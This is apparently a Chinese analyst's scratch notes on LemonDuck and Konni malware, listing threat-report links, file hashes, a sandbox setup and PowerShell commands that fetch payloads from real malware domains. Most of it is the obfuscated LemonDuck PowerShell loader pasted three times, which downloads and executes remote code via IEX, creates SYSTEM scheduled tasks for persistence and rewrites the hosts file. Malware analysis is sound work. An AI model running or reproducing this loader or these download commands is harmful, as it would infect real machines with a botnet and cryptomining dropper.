杂货1223

PE注入 - Macchiato


一次对钓鱼邮件攻击者的深度溯源分析-安全客 - 安全资讯平台

https://threatbook.cn/ppt/Konni%E6%9C%A8%E9%A9%AC%E5%B1%95%E5%BC%80%E6%96%B0%E4%B8%80%E8%BD%AE%E9%92%93%E9%B1%BC%E6%94%BB%E5%87%BB.pdf

MD5
98bf04d3d6e25c0cac4ac6af604bcdbf
779c89b9404bdd69547c28885167f131
d0b03daf3c84987768bd4ce8e2a77548
51f6eba99e2b33e5458d78e41a130fe2
db50d9392ea9dd0efceb2364f0e2f187
5d4d94ee7e06bbb0af9584119797b23a
f3b25701fe362ec84616a93a45ce9998
df5c8f7677a3361d17cc1ba820436ce9

https://www.tj-un.com/pdf/LemonDuck.pdf

a.jsp  下载 http://127.0.0.1:43669/1/summary

http://d.ackng.com/m6.bin?

http://d.ackng.com/if.bin?
https://s.threatbook.com/report/file/eacddae1b05647663bfd625207135f989c2171d5c4fc3c030dbc8e13ca7c93a9下载if.bin

修改host文件,把域名请求指向127.0.0.1,从这上面下载文件
搭建一个jsp服务器

sudo inetsim --data data --conf inetsim.conf
 

(New-Object Net.WebClient)."downloaddata"('http://d.ackng.com/if.bin?') ok?

(New-Object Net.WebClient).DownloadFile('http://d.ackng.com/m6.bin?', 'm6.bin')  ok

readme.doc MD5:48DF6A48121622D0B67A75BB928F80D0

kr.bin md5:e04acec7ab98362d87d1c53d84fc4b03

report.jsp md5:6038cd68f69ac785118bb5b0d058b667

https://www.fireeye.com/content/dam/fireeye-www/services/freeware/sdl-apatedns.zip

 (' (736xhCv=ajf?xhC{v}_ajf+('+'Get-Dat'+'e -Format ZnfyyyyMM'+'ddZn736+736f)

x'+'hC736+736t'+'mps=Znf-c ajfZnf+Z'+'736+736nfxh736+736CLemon_Duck=ZnfZnf'+'_'+'TZnfZ7'+'36+736nf;xhCx=ZnfZnf_736+73'+'6U1ZnfZnf+ZnfZnf_U2Znf736+736Znf;REP;xhCy=Zn736+7'+'36fZnfhttp://Znf'+'Znf+xhCx+ZnfZnf/CTL.jsZnfZnf;xhCz=xhCy+ZnfZnf736+736pZnf+xhCv+ZnfZnfZnf;xhCm736+736=73'+'6+736(Ne6o8'+'w-Obj6o8ect Net.WebC'+'6o8lient).ajfDownloadDataajf(xhCy736+736);[System.'+'Security.Cryptog736+736raphy.MD5]::Create().Comp'+'uteHash(xh736+736Cm)rKYforeach{'+'x'+'hCs+=xhC_.ToString(ZnfZnfx2Znf'+'Znf)};if(xhCs-eqZnfZnfa49add2a8eeb7e89b9d743c0af0e1443ZnfZnf){IEX(736+736-join[char[]]xhCm)}736+736ajfZn'+'f

xhCs'+'a=([Security.Principal.WindowsPrincipal][Security.Prin736+736cipal.WindowsIdentity]::GetCurrent'+'()).IsInR'+'ole(['+'Se'+'curity.Principal.WindowsBuiltInRole] ajfAdminist'+'ratorajf)

function getRan(){return -join([char[]](48..736+73657+65..9'+'0+97..122)'+'rKYGe736+736t-Random -Count (6+(Get-Random)%6))}

xhCus=@(Znft.tr2q.comZnf,Znft.awcna.comZnf,Znft.amy'+'nx.comZnf)

xhCus+=(getRan)7'+'36+736+Znf.cnZnf;x736+736hCus'+'+=(getRan)+Znf.jp736+736Znf;xhCus+=(getRan)+'+'Znf.krZ'+'nf

xhCstsrv = New-Objec'+'t -ComObje'+'ct 736+736Schedu'+'le.Service

xhCstsrv.Connect(xhCe'+'nv:COMPUT'+'ERNAME)

attrib -R C:K3MWI'+'NDOWSK3Msystem32K3Md736+736riversK3MetcK3Mhosts

try{xhCdoit=xhCstsrv.GetFol'+'der(ajfK3Maj'+'f).GetTask(ajfbl'+'ueteaajf)}catch{}

if(-not xhCdoit){

    foreach(xhCu in xhCus){7'+'36+736

        xhCi = [array]::'+'IndexOf'+'(xhCus,xhCu)

        if(xhCi%3 -eq 0){xhCt736+736nf=ZnfZnf}

        if(xhCi%3 -eq 1){xhCtnf=getR'+'a'+'736+'+'736n}736+736'+'

        if(xhCi%3 -eq 2){if(xhCsa)736+736{'+'xhCtnf=ZnfMicroSoftK3MWindo'+'w'+'sK3MZnf+(getRan)}else{xhCtnf=ge736+736tRan}}

        xhCtn = getRan

        if(xhCsa){

            schtasks /create /ru s7'+'36+736yst736+736em /sc MINUTE /mo 60 /tn ajfxhCtnfK3MxhCtnajf /F /tr ajfpowershell736+736 PS_CMDajf'+'

        } el'+'se {

            schta'+'sks /creat'+'e /sc MINUTE /mo 60 /tn ajfxhCtnfK3MxhCtn736+736ajf /F /tr ajfpowershell PS_CMD'+'ajf

    '+'    }

        start-sle'+'ep 736+7361

736+736        xh'+'Cfolder=xhCstsrv.GetFolder(ajfK3MxhC736+736tnfajf'+')

        xhCtaskitem=xhCfolder.G736+736etTasks(1)

        foreach(xhCtask i'+'n xhCtas'+'kitem){

            foreach (xhCaction in xhCtas'+'k.Defi'+'nition.Actions) {

                try{

736+736                    if(xh736+736Cact'+'ion.Arguments.Contains(ajfPS_CMDajf)){    

                        xhCctl=Znfx'+'Znf

                        if(xhCi -ge 3)73'+'6+736{xhCrep=Znf[Net.Dns]::GetHostAddresses(ZnfZnfZnf+xhCu'+'s[xhCi-3].substring(0,5)+ZnfZnfZnf736+7'+'36+Znf736+736Zn'+'f736+7'+'36Znf+xhCus[xhCi-3].substring(5)+ZnfZnfZnf)[0].IPAddressToString+Znf'+'Znf ZnfZnf+736'+'+736xhCxrKYout-file -'+'ajfencoding'+'ajf as6o8ci6o8i c:K3MwindowsK3Msystem32K3MdriversK3MetcK3MhostsZnf;'+'xhCctl='+'ZnfwZnf}

                        xhCfolder.RegisterTask(xhCtas736+736k.Name, xhCtask.Xml.replace(ajfPS_CMDajf,xhCtmps.replace(Znf_TZnf,ajfxhCtnfK3MxhCtnajf).replac'+'e(Z'+'nf_U1Znf,xhCu.substri736+736n736+736g736+736(0,5)).repla736+736ce(Znf_U2Znf,xhCu.substring(5)).rep'+'lace(ZnfREPZnf,xhCrep).r736+736eplace(ZnfCTLZnf,xhCctl)), 4, x'+'hCnull, xhCnull, 736+7361, xhCnull'+')rKYout-n736+736ull

                    }

                }catch{}

            }

        }

        schtas'+'ks736+736 /run /tn ajfxhCtnfK3MxhCtn'+'ajf

    '+'    start-'+'sleep 5

    }

    if(x'+'hC'+'sa){

        schtasks /creat'+'e /ru system'+' /sc MINUTE /mo 120 /tn bluetea /F /tr ajfblueteaajf

    } else {736+736

        schtasks /create /sc MINUTE /mo 120 /t'+'n bluetea /F /tr ajfblueteaajf

    }

}

736+736schtasks /delete '+'/tn Rtsa2 /F

schtasks /delete /tn Rts736+736a1 /F

schtasks /delete /tn Rtsa /F

736).REPLace(736xhC736,736O0K736).REPL'+'ace('+'([char]114+[char]75+[c'+'har]89),'+'7366U'+'S736).REPLace(([char]90+[c'+'har'+']110+[char]102),[STRing][char]39).REPLace((['+'char]'+'97+[char]106+[char]102),[STRing][c'+'har]34).R'+'EPLace(([char]54+[char]111'+'+[char]56),736UvB736).REPLace(([char]75+[char]51+[char]7'+'7),736KOW736)6US&( O0KsHELliD[1]+O0KSHeLLiD[13]+736X'+'736)

').REPLaCe(([chaR]55+[chaR]51+[chaR]54),[sTRIng][chaR]39).REPLaCe(([chaR]75+[chaR]79+[chaR]87),[sTRIng][chaR]92).REPLaCe('UvB',[sTRIng][chaR]96).REPLaCe(([chaR]79+[chaR]48+[chaR]75),[sTRIng][chaR]36).REPLaCe('6US',[sTRIng][chaR]124) | . ( $sHELlID[1]+$SHELliD[13]+'x')

颠倒过后的数据:

 (' (736xhCv=ajf?xhC{v}_ajf+('+'Get-Dat'+'e -Format ZnfyyyyMM'+'ddZn736+736f)

x'+'hC736+736t'+'mps=Znf-c ajfZnf+Z'+'736+736nfxh736+736CLemon_Duck=ZnfZnf'+'_'+'TZnfZ7'+'36+736nf;xhCx=ZnfZnf_736+73'+'6U1ZnfZnf+ZnfZnf_U2Znf736+736Znf;REP;xhCy=Zn736+7'+'36fZnfhttp://Znf'+'Znf+xhCx+ZnfZnf/CTL.jsZnfZnf;xhCz=xhCy+ZnfZnf736+736pZnf+xhCv+ZnfZnfZnf;xhCm736+736=73'+'6+736(Ne6o8'+'w-Obj6o8ect Net.WebC'+'6o8lient).ajfDownloadDataajf(xhCy736+736);[System.'+'Security.Cryptog736+736raphy.MD5]::Create().Comp'+'uteHash(xh736+736Cm)rKYforeach{'+'x'+'hCs+=xhC_.ToString(ZnfZnfx2Znf'+'Znf)};if(xhCs-eqZnfZnfa49add2a8eeb7e89b9d743c0af0e1443ZnfZnf){IEX(736+736-join[char[]]xhCm)}736+736ajfZn'+'f

xhCs'+'a=([Security.Principal.WindowsPrincipal][Security.Prin736+736cipal.WindowsIdentity]::GetCurrent'+'()).IsInR'+'ole(['+'Se'+'curity.Principal.WindowsBuiltInRole] ajfAdminist'+'ratorajf)

function getRan(){return -join([char[]](48..736+73657+65..9'+'0+97..122)'+'rKYGe736+736t-Random -Count (6+(Get-Random)%6))}

xhCus=@(Znft.tr2q.comZnf,Znft.awcna.comZnf,Znft.amy'+'nx.comZnf)

xhCus+=(getRan)7'+'36+736+Znf.cnZnf;x736+736hCus'+'+=(getRan)+Znf.jp736+736Znf;xhCus+=(getRan)+'+'Znf.krZ'+'nf

xhCstsrv = New-Objec'+'t -ComObje'+'ct 736+736Schedu'+'le.Service

xhCstsrv.Connect(xhCe'+'nv:COMPUT'+'ERNAME)

attrib -R C:K3MWI'+'NDOWSK3Msystem32K3Md736+736riversK3MetcK3Mhosts

try{xhCdoit=xhCstsrv.GetFol'+'der(ajfK3Maj'+'f).GetTask(ajfbl'+'ueteaajf)}catch{}

if(-not xhCdoit){

    foreach(xhCu in xhCus){7'+'36+736

        xhCi = [array]::'+'IndexOf'+'(xhCus,xhCu)

        if(xhCi%3 -eq 0){xhCt736+736nf=ZnfZnf}

        if(xhCi%3 -eq 1){xhCtnf=getR'+'a'+'736+'+'736n}736+736'+'

        if(xhCi%3 -eq 2){if(xhCsa)736+736{'+'xhCtnf=ZnfMicroSoftK3MWindo'+'w'+'sK3MZnf+(getRan)}else{xhCtnf=ge736+736tRan}}

        xhCtn = getRan

        if(xhCsa){

            schtasks /create /ru s7'+'36+736yst736+736em /sc MINUTE /mo 60 /tn ajfxhCtnfK3MxhCtnajf /F /tr ajfpowershell736+736 PS_CMDajf'+'

        } el'+'se {

            schta'+'sks /creat'+'e /sc MINUTE /mo 60 /tn ajfxhCtnfK3MxhCtn736+736ajf /F /tr ajfpowershell PS_CMD'+'ajf

    '+'    }

        start-sle'+'ep 736+7361

736+736        xh'+'Cfolder=xhCstsrv.GetFolder(ajfK3MxhC736+736tnfajf'+')

        xhCtaskitem=xhCfolder.G736+736etTasks(1)

        foreach(xhCtask i'+'n xhCtas'+'kitem){

            foreach (xhCaction in xhCtas'+'k.Defi'+'nition.Actions) {

                try{

736+736                    if(xh736+736Cact'+'ion.Arguments.Contains(ajfPS_CMDajf)){    

                        xhCctl=Znfx'+'Znf

                        if(xhCi -ge 3)73'+'6+736{xhCrep=Znf[Net.Dns]::GetHostAddresses(ZnfZnfZnf+xhCu'+'s[xhCi-3].substring(0,5)+ZnfZnfZnf736+7'+'36+Znf736+736Zn'+'f736+7'+'36Znf+xhCus[xhCi-3].substring(5)+ZnfZnfZnf)[0].IPAddressToString+Znf'+'Znf ZnfZnf+736'+'+736xhCxrKYout-file -'+'ajfencoding'+'ajf as6o8ci6o8i c:K3MwindowsK3Msystem32K3MdriversK3MetcK3MhostsZnf;'+'xhCctl='+'ZnfwZnf}

                        xhCfolder.RegisterTask(xhCtas736+736k.Name, xhCtask.Xml.replace(ajfPS_CMDajf,xhCtmps.replace(Znf_TZnf,ajfxhCtnfK3MxhCtnajf).replac'+'e(Z'+'nf_U1Znf,xhCu.substri736+736n736+736g736+736(0,5)).repla736+736ce(Znf_U2Znf,xhCu.substring(5)).rep'+'lace(ZnfREPZnf,xhCrep).r736+736eplace(ZnfCTLZnf,xhCctl)), 4, x'+'hCnull, xhCnull, 736+7361, xhCnull'+')rKYout-n736+736ull

                    }

                }catch{}

            }

        }

        schtas'+'ks736+736 /run /tn ajfxhCtnfK3MxhCtn'+'ajf

    '+'    start-'+'sleep 5

    }

    if(x'+'hC'+'sa){

        schtasks /creat'+'e /ru system'+' /sc MINUTE /mo 120 /tn bluetea /F /tr ajfblueteaajf

    } else {736+736

        schtasks /create /sc MINUTE /mo 120 /t'+'n bluetea /F /tr ajfblueteaajf

    }

}

736+736schtasks /delete '+'/tn Rtsa2 /F

schtasks /delete /tn Rts736+736a1 /F

schtasks /delete /tn Rtsa /F

736).REPLace(736xhC736,736O0K736).REPL'+'ace('+'([char]114+[char]75+[c'+'har]89),'+'7366U'+'S736).REPLace(([char]90+[c'+'har'+']110+[char]102),[STRing][char]39).REPLace((['+'char]'+'97+[char]106+[char]102),[STRing][c'+'har]34).R'+'EPLace(([char]54+[char]111'+'+[char]56),736UvB736).REPLace(([char]75+[char]51+[char]7'+'7),736KOW736)6US&( O0KsHELliD[1]+O0KSHeLLiD[13]+736X'+'736)

').REPLaCe(([chaR]55+[chaR]51+[chaR]54),[sTRIng][chaR]39).REPLaCe(([chaR]75+[chaR]79+[chaR]87),[sTRIng][chaR]92).REPLaCe('UvB',[sTRIng][chaR]96).REPLaCe(([chaR]79+[chaR]48+[chaR]75),[sTRIng][chaR]36).REPLaCe('6US',[sTRIng][chaR]124) | . ( $sHELlID[1]+$SHELliD[13]+'x')

顺序的命令:

 (736xhCv=ajf?xhC{v}_ajf+(Get-Date -Format ZnfyyyyMMddZn736+736f)

xhC736+736tmps=Znf-c ajfZnf+Z736+736nfxh736+736CLemon_Duck=ZnfZnf_TZnfZ736+736nf;xhCx=ZnfZnf_736+736U1ZnfZnf+ZnfZnf_U2Znf736+736Znf;REP;xhCy=Zn736+736fZnfhttp://ZnfZnf+xhCx+ZnfZnf/CTL.jsZnfZnf;xhCz=xhCy+ZnfZnf736+736pZnf+xhCv+ZnfZnfZnf;xhCm736+736=736+736(Ne6o8w-Obj6o8ect Net.WebC6o8lient).ajfDownloadDataajf(xhCy736+736);[System.Security.Cryptog736+736raphy.MD5]::Create().ComputeHash(xh736+736Cm)rKYforeach{xhCs+=xhC_.ToString(ZnfZnfx2ZnfZnf)};if(xhCs-eqZnfZnfa49add2a8eeb7e89b9d743c0af0e1443ZnfZnf){IEX(736+736-join[char[]]xhCm)}736+736ajfZnf

xhCsa=([Security.Principal.WindowsPrincipal][Security.Prin736+736cipal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] ajfAdministratorajf)

function getRan(){return -join([char[]](48..736+73657+65..90+97..122)rKYGe736+736t-Random -Count (6+(Get-Random)%6))}

xhCus=@(Znft.tr2q.comZnf,Znft.awcna.comZnf,Znft.amynx.comZnf)

xhCus+=(getRan)736+736+Znf.cnZnf;x736+736hCus+=(getRan)+Znf.jp736+736Znf;xhCus+=(getRan)+Znf.krZnf

xhCstsrv = New-Object -ComObject 736+736Schedule.Service

xhCstsrv.Connect(xhCenv:COMPUTERNAME)

attrib -R C:K3MWINDOWSK3Msystem32K3Md736+736riversK3MetcK3Mhosts

try{xhCdoit=xhCstsrv.GetFolder(ajfK3Majf).GetTask(ajfblueteaajf)}catch{}

if(-not xhCdoit){

    foreach(xhCu in xhCus){736+736

        xhCi = [array]::IndexOf(xhCus,xhCu)

        if(xhCi%3 -eq 0){xhCt736+736nf=ZnfZnf}

        if(xhCi%3 -eq 1){xhCtnf=getRa736+736n}736+736

        if(xhCi%3 -eq 2){if(xhCsa)736+736{xhCtnf=ZnfMicroSoftK3MWindowsK3MZnf+(getRan)}else{xhCtnf=ge736+736tRan}}

        xhCtn = getRan

        if(xhCsa){

            schtasks /create /ru s736+736yst736+736em /sc MINUTE /mo 60 /tn ajfxhCtnfK3MxhCtnajf /F /tr ajfpowershell736+736 PS_CMDajf

        } else {

            schtasks /create /sc MINUTE /mo 60 /tn ajfxhCtnfK3MxhCtn736+736ajf /F /tr ajfpowershell PS_CMDajf

        }

        start-sleep 736+7361

736+736        xhCfolder=xhCstsrv.GetFolder(ajfK3MxhC736+736tnfajf)

        xhCtaskitem=xhCfolder.G736+736etTasks(1)

        foreach(xhCtask in xhCtaskitem){

            foreach (xhCaction in xhCtask.Definition.Actions) {

                try{

736+736                    if(xh736+736Caction.Arguments.Contains(ajfPS_CMDajf)){    

                        xhCctl=ZnfxZnf

                        if(xhCi -ge 3)736+736{xhCrep=Znf[Net.Dns]::GetHostAddresses(ZnfZnfZnf+xhCus[xhCi-3].substring(0,5)+ZnfZnfZnf736+736+Znf736+736Znf736+736Znf+xhCus[xhCi-3].substring(5)+ZnfZnfZnf)[0].IPAddressToString+ZnfZnf ZnfZnf+736+736xhCxrKYout-file -ajfencodingajf as6o8ci6o8i c:K3MwindowsK3Msystem32K3MdriversK3MetcK3MhostsZnf;xhCctl=ZnfwZnf}

                        xhCfolder.RegisterTask(xhCtas736+736k.Name, xhCtask.Xml.replace(ajfPS_CMDajf,xhCtmps.replace(Znf_TZnf,ajfxhCtnfK3MxhCtnajf).replace(Znf_U1Znf,xhCu.substri736+736n736+736g736+736(0,5)).repla736+736ce(Znf_U2Znf,xhCu.substring(5)).replace(ZnfREPZnf,xhCrep).r736+736eplace(ZnfCTLZnf,xhCctl)), 4, xhCnull, xhCnull, 736+7361, xhCnull)rKYout-n736+736ull

                    }

                }catch{}

            }

        }

        schtasks736+736 /run /tn ajfxhCtnfK3MxhCtnajf

        start-sleep 5

    }

    if(xhCsa){

        schtasks /create /ru system /sc MINUTE /mo 120 /tn bluetea /F /tr ajfblueteaajf

    } else {736+736

        schtasks /create /sc MINUTE /mo 120 /tn bluetea /F /tr ajfblueteaajf

    }

}

736+736schtasks /delete /tn Rtsa2 /F

schtasks /delete /tn Rts736+736a1 /F

schtasks /delete /tn Rtsa /F

736)
 

你可能感兴趣的:(sqlite)